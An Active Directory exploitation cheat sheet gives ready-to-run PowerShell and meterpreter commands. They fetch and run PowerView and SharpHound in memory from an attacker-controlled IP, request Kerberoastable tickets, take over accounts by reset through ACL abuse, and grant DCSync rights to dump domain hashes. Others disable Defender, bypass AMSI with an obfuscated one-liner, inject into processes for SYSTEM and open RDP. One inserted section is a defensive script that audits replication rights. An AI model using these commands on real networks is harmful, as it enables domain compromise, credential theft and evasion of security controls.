Domain Exploitation

This is just a living document of things I have needed for domain enumeration/exploitation.

POWERSPLOIT

Use the dev branch of PowerSploit. For an already incredible cheat sheet, check out HarmJ0y's.

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')

Get Domain Users

Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,mail,useraccountcontrol | Export-CSV users.csv

Get Domain Computers

Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv

SPN Ticket Request

Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation

Enumerate User DACLs

PS C:\> Get-DomainObjectAcl -Identity it_admin -ResolveGUIDs | ? { $_.SecurityIdentifier -Match $(ConvertTo-SID burmat) }
AceType : AccessAllowed
ObjectDN : CN=it_admin,CN=Users,DC=BURMAT,DC=CO
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2736429227-4547413232-2815246478-1130
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2736429227-4547413232-2815246478-1107
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

Reset Domain User Password

If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc.), you can reset the password with ease:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;

Or if you can set yourself as owner, the following will do:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass

Add/Exploit DCSync Rights

Do you have WriteDACL to a domain? Give DCSync rights to an unprivileged domain user account:

Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync

And use these rights to dump the hashes from the domain:

meterpreter > dcsync_ntlm BURMATCO\\useracct1
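
To check which principals hold replication rights on a domain root, for instance after an ACL change like the one above, the following added example (not from the original page or from PowerView) reads the domain root's DACL through ADSI and lists every holder outside an allow-list. The allow-list of default SIDs/RIDs and the variable names are assumptions to adjust per environment.

```powershell
# Added example (not from the original page): list who can replicate secrets (DCSync)
# from the domain root. Assumes a domain-joined host and read access to the domain ACL.
$domainDn = [string]([ADSI]'LDAP://RootDSE').defaultNamingContext  # e.g. DC=burmatco,DC=local
$root     = [ADSI]"LDAP://$domainDn"

# Control access rights involved in directory replication
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Assumed allow-list: Enterprise DCs, SYSTEM, BUILTIN\Administrators, and the RIDs for
# Enterprise RODCs (498), Domain Admins (512), Domain Controllers (516), Enterprise Admins (519).
# Adjust for your environment (a directory sync service account, for example).
$expected = '^S-1-5-9$|^S-1-5-18$|^S-1-5-32-544$|-(498|512|516|519)$'

$sidType = [System.Security.Principal.SecurityIdentifier]
$rules   = $root.psbase.ObjectSecurity.GetAccessRules($true, $true, $sidType)

$findings = foreach ($ace in $rules) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    # PropagationFlags 2 = InheritOnly: the ACE applies to descendants, not the root itself
    if ([int]$ace.PropagationFlags -band 2) { continue }
    # 0x100 = ExtendedRight; GenericAll (983551) includes this bit
    if (([int]$ace.ActiveDirectoryRights -band 0x100) -eq 0) { continue }

    $guid = $ace.ObjectType.ToString()
    if ($ace.ObjectType -eq [guid]::Empty) { $right = 'All extended rights' }
    elseif ($replRights.ContainsKey($guid)) { $right = $replRights[$guid] }
    else { continue }

    $sid = $ace.IdentityReference.Value
    if ($sid -match $expected) { continue }

    # Resolve the SID to a name where possible; deleted principals stay as raw SIDs
    try   { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = '(unresolved)' }

    [pscustomobject]@{
        Principal = $name
        Sid       = $sid
        Right     = $right
        Inherited = $ace.IsInherited
    }
}

$findings | Sort-Object Sid, Right | Format-Table -AutoSize
```

An empty result means only allow-listed principals hold replication or all-extended-rights access on the domain root.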

BLOODHOUND

Ingestor Launch

IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.123/ps/SharpHound.ps1');
Invoke-BloodHound -CollectionMethod All -CompressData -SkipPing;

EVADING AV

Turning Off Defender's RTM

PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true

AMSI Bypass

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

SeDebugPrivilege

If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM.

One way of doing it is to use decoder's psgetsys.ps1 script once you have a good idea of a PID to inject into:

. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');

You can also gain an MSF session and use the module windows/manage/payload_inject with a PID of your choice.

REMOTE DESKTOP

Enable RDP

PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"